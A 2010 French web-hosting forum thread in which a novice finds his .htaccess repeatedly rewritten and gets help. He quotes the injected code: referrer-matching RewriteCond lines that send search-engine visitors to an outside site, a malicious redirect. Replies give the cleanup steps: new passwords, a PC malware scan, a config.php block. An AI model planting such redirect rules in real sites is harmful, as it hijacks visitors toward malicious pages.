Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2486 connectés 

  FORUM HardWare.fr
  Programmation
  PHP

  [Résolu] htaccess change tout seul...

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

[Résolu] htaccess change tout seul...

n°1967183
Nive46
Posté le 18-02-2010 à 12:37:20  profilanswer
 

Coucou à tous. Je suis nouveau sur le forum et tout aussi nouveau en prog...
 
Dans le cadre de l'arrivée prochaine de mon premier bébé, j'ai décidé de mettre en place un site perso pour pouvoir partager avec toute ma famille et mes amis ce moment particulier de ma vie.
 
Etant client chez free, je n'ai donc pas cherché bien loin où faire héberger mon site...
 
J'avais dans l'idée d'utiliser une galerie photo nécessitant le passage en php5, du coup, j'ai suivi les conseils trouvés sur le net en créant à la racine un fichier .htaccess. Mais là, les choses se compliquent. Au départ, tout fonctionne parfaitement mais au bout de quelques temps (c'est variable, de quelques secondes a quelques heures), lorsque je tente de revenir sur mon site, plus rien ne marche (erreur 500). Je vais donc voir ce qui se passe sur mon site avec filezilla et je constate à chaque fois que mon .htaccess a été modifié (par qui, par quoi ???) sans que j'y touche. Au lieu de "php1" je me retrouve avec un truc de ce genre :
 
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://storeoffers.info/go.php [R,L]
 
Sachant que free ne sait pas gérer le rewrite, j'imagine que c'est ça qui fait planter mon site en me provoquant une jolie erreur 500...
 
Si quelqu'un pouvait m'aider à comprendre d'où viennent ces changements intempestifs et à les empecher ça serait formidable... Merci d'avance.
 
PS : j'éspère que ce sujet n'a pas déjà été traité dans un autre post, en tout cas je n'ai rien trouvé lors de mes recherches...


Message édité par Nive46 le 23-02-2010 à 00:19:06
mood
Publicité
Posté le 18-02-2010 à 12:37:20  profilanswer
 

n°1967186
tomsoft
Posté le 18-02-2010 à 13:06:56  profilanswer
 

t'as une verole qui te redigige pas mal de choses sur http://storeoffers.info/go.php on dirait :d

n°1967189
Nive46
Posté le 18-02-2010 à 13:21:55  profilanswer
 

Nan, serieux ? Tu veux dire que j'ai une sorte de virus sur mon site ? c'est possible ça ???
Je fais comment pour réparer tout ça ???

n°1967230
pataluc
Posté le 18-02-2010 à 14:55:17  profilanswer
 

tu as du utiliser une galerie php qui contient une faille... vérifie que tu es bien à jour... c'est sans doute par un des scripts php que le site se fait hacker.

n°1967333
aideinfo
Posté le 18-02-2010 à 18:46:17  profilanswer
 

Change ton mot de passe FTP et MySQL, et mets à la racine de ta gallerie le code suivant dans un .htaccess :  
 

Code :
  1. <Files config.php>
  2. deny from all
  3. </Files>


 
Et vérifie aussi que tu as la dernière version de ta galerie.


---------------
http://www.aideinfo.com/  Whois adresses IP/domaines le plus évolué !!  FAQ Free Mobile
n°1967370
stealth35
Posté le 18-02-2010 à 21:20:35  profilanswer
 

sympa, un lien qui me montre un truc windows, qui scan mon PC et tout, mais j'ai un mac  héhéhé

n°1967386
Nive46
Posté le 18-02-2010 à 22:03:54  profilanswer
 

A vrai dire, en ce qui concerne la mise a jour de la galerie, c'est pas un problème car elle n'est plus sur le site. En fait, j'ai effacé tout le site plusieurs fois (tout viré via filezilla et effacé les tables sql) sans changement. Au dernier essai j'ai juste remis sur le site mes fichiers htaccess et un dossier "site" vide contenant en théorie la partie protégée. Il n'y a rien d'autre sur le site et mon pb persiste...

n°1967439
NewsletTux
&lt;Insérez ici votre vie /&gt;
Posté le 19-02-2010 à 08:51:25  profilanswer
 

est-ce que les visiteurs peuvent uploader des fichiers (avatars, par exemple) qui auraient un droit d'exécution ? (chmod 777 trop rapide ...)


---------------
NewsletTux - outil de mailing list en PHP MySQL
n°1967465
pataluc
Posté le 19-02-2010 à 09:57:20  profilanswer
 

j'ai déja entendu parlé de problème de pc vérolé qui faisait que tous les fichiers uploadés par ftp se trouvaient altérés par le malware... c'est peut être ton cas... essaie de passer des anti spyware en plus d'antivirus pour voir si tu n'es pas infecté par ce genre de truc.

n°1967485
aideinfo
Posté le 19-02-2010 à 10:29:23  profilanswer
 

stealth35 a écrit :

sympa, un lien qui me montre un truc windows, qui scan mon PC et tout, mais j'ai un mac  héhéhé


 
Oh mon dieu, il a formaté ton disque et installé Windows sur toin Mac !! :cry:  
 
 
Commence par changer ton mot de passe, il est possible qu'il ait été cracké ou volé par un trojan. Et vérifie aussi ton PC avec un BON antimalware et un BON antivirus (l'AV en ligne de Kaspersky par exemple).


---------------
http://www.aideinfo.com/  Whois adresses IP/domaines le plus évolué !!  FAQ Free Mobile
mood
Publicité
Posté le 19-02-2010 à 10:29:23  profilanswer
 

n°1967540
Nive46
Posté le 19-02-2010 à 12:10:22  profilanswer
 

Pour ce qui est des chmod, de toute façon c'est très simple, je suis chez Free... Donc ils sont bloqués.
Aux dernières réinstallations du site il n'y avait rien d'uploadable, seulement mes htaccess et un dossier vide, ce qui n'empechait pas le problème de revenir.
J'ai changé hier mon mot de passe et ajouté les quelques lignes conseillées à mon htaccess et pour le moment, ça se passe bien, rien n'a été remodifié.
Je vais maintenant vérifier mon pc, si vous pensez que ça peut venir de là. Je vous dis ce qu'il en est dans la soirée... Merci bien de vous creuser la tête en tout cas.

n°1967775
Nive46
Posté le 20-02-2010 à 01:52:25  profilanswer
 

Bon, et bien voici les nouvelles du front...
Après avoir changé mon mot de passe et avoir débusqué quelques malwares sur mon pc, je suis heureux de vous écrire que mon site (enfin, les fondations de mon site...) se porte bien. Aucun nouveau changement de mon htaccess depuis ce matin. Je reste prudent quand même mais ça semble bien parti pour marcher comme il faut cette fois-ci...
Un énorme merci à tous de m'avoir dépatouillé de ce mauvais pas et de me permettre de repartir sur des bases plus saines.

n°1967812
Sheeloo
Enfoirés de nihilistes !
Posté le 20-02-2010 à 12:51:05  profilanswer
 

Et ben dans ce cas, félicitations pour l'arrivée de ton bébé :)

n°1967821
aideinfo
Posté le 20-02-2010 à 15:02:07  profilanswer
 

Utilise un mot de passe fort pour ton FTP, sinon, ça risque de recommencer.


---------------
http://www.aideinfo.com/  Whois adresses IP/domaines le plus évolué !!  FAQ Free Mobile

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  PHP

  [Résolu] htaccess change tout seul...

 

Sujets relatifs
[Résolu] Faire plusieurs requetes mysql en meme tempsentier a valeur maximum. (RESOLU)
[Résolu] Applet signée : pas d'avertissement de sécurité[Résolu] Batch to C
[Résolu] [Access2007] Création requete complexe[ KSH ] Etrange comportement d'un while dans un for - RESOLU -
[resolu] recherche et insertion structure liste chaine: la V2Manipulation de bits. (RESOLU)
[Résolu] Envoyer un signal à un autre ordinateur via internet[Résolu]Suppression de dossier en VBS
Plus de sujets relatifs à : [Résolu] htaccess change tout seul...


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR